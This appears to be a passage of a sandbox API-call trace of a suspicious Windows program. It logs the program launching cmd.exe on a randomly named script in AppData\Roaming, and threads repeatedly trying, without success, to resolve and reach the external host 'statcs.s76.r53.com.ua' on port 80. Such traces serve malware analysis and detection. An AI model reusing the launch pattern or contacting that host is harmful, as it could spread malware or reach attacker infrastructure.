1 [0117.177] CloseHandle (hObject=0x110) returned 1 [0117.178] GetCurrentThreadId () returned 0xdf8 [0117.178] GetCurrentThreadId () returned 0xdf8 [0117.178] GetCurrentThreadId () returned 0xdf8 [0117.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0x120, hThread=0x110, dwProcessId=0xe9c, dwThreadId=0xea0)) returned 1 [0117.180] CloseHandle (hObject=0x120) returned 1 [0117.180] CloseHandle (hObject=0x110) returned 1 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] 
GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] GetCurrentThreadId () returned 0xdf8 [0117.180] WSACleanup () returned 0 [0117.249] FreeLibrary (hLibModule=0x77380000) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentProcess () returned 0xffffffff [0117.249] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0117.249] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] ResetEvent (hEvent=0x88) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] ResetEvent (hEvent=0x88) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] 
GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] CloseHandle (hObject=0x88) returned 1 [0117.249] CloseHandle (hObject=0x8c) returned 1 [0117.249] CloseHandle (hObject=0x84) returned 1 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetCurrentThreadId () returned 0xdf8 [0117.249] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) 
[0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.250] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 
wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x216)) [0117.251] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.253] FreeLibrary (hLibModule=0x76910000) returned 1 [0117.253] LocalFree (hMem=0x214530) returned 0x0 [0117.253] FreeLibrary (hLibModule=0x76910000) returned 1 [0117.253] LocalFree (hMem=0x214520) returned 0x0 [0117.253] ExitProcess (uExitCode=0x0) Thread: id = 90 os_tid = 0xe54 Thread: id = 93 os_tid = 0xe6c [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f853c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) 
returned 21 [0116.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431fac, cbMultiByte=27, lpWideCharStr=0x199ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea6fc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0116.840] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0116.909] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0116.910] getnameinfo (in: pSockaddr=0x199fc14, SockaddrLength=0x0, pNodeBuffer=0x1359d4c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: 
pNodeBuffer="", pServiceBuffer="C") returned 10047 [0116.910] htons (hostshort=0x0) returned 0x0 [0116.910] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0116.910] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] SetEvent (hEvent=0x84) returned 1 [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] CloseHandle (hObject=0xb8) returned 1 [0116.910] RtlExitUserThread (Status=0x0) Thread: id = 97 os_tid = 0xe84 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.075] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431fac, cbMultiByte=27, 
lpWideCharStr=0x199ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea6cc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.075] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0117.148] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), 